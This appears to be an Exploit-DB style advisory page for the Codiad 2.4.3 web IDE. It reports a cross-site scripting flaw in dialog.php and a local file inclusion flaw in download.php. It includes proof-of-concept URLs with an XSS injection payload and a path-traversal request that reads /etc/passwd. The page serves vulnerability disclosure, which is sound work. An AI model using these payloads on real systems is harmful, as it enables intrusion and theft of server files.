Codiad 2.4.3 - Cross Site Scripting - Local File Inclusion Vulnerability's

vendor:

Codiad

by:

TaurusOmar

7,5

CVSS

HIGH

Cross Site Scripting & Local File Inclusion

79, 22

CWE

Product Name: Codiad

Affected Version From: 2.4.3

Affected Version To: 2.4.3

Patch Exists: NO

Related CWE: CVE-2014-1137

CPE: a:codiad:codiad

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Bugtraq Optimus

2014

Codiad 2.4.3 – Cross Site Scripting – Local File Inclusion Vulnerability’s

Codiad is a web-based IDE framework with a small footprint and minimal requirements. An attacker can exploit a Cross Site Scripting vulnerability in the 'dialog.php' script by injecting malicious JavaScript code in the 'short_name' parameter. Additionally, an attacker can exploit a Local File Inclusion vulnerability in the 'download.php' script by accessing the 'path' parameter to download private files from the server.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in the application.

Source

Exploit-DB raw data:

               -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                 INDEPENDENT SECURITY RESEARCHER 
                   PENETRATION TESTING SECURITY
               -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 

# Exploit Title: Codiad 2.4.3 - Cross Site Scripting - Local File Inclusion Vulnerability's 
# Date: 19/12/2014
# Url Vendor: http://codiad.com/
# Vendor Name: Codiad
# Version: 2.4.3
# CVE:  CVE-2014-1137
# Author: TaurusOmar	
# Tiwtter: @TaurusOmar_
# Email:  taurusomar13@gmail.com
# Home:  overhat.blogspot.com
# Tested On: Bugtraq Optimus
# Risk: High

Description
Codiad is a web-based IDE framework with a small footprint and minimal requirements.
Codiad was built with simplicity in mind, allowing for fast, interactive development without the massive overhead of some of the larger desktop editors. That being said even users of IDE's such as Eclipse, NetBeans and Aptana are finding Codiad's simplicity to be a huge benefit. While simplicity was key, we didn't skimp on features and have a team of dedicated developer actively adding more.


------------------------
+ CROSS SITE SCRIPTING + 
------------------------
#Exploiting Description - Get into code xss in next path

/components/filemanager/dialog.php?action=rename&path=3&short_name=

#P0c
http://site.com/components/filemanager/dialog.php?action=rename&path=3&short_name='"><img src=x onerror=prompt(1);>

#Proof Concept
http://i.imgur.com/rr9b42K.jpg


------------------------
+  Local File Incluson +
------------------------
# Exploiting Description - Get into path in ur' browser and download private file server /etc/passwd 

#P0c
http://site.com/components/filemanager/download.php?path=../../../../../../../../../../../etc/passwd&type=undefined

#Proof Concept
http://i.imgur.com/LSm360S.jpg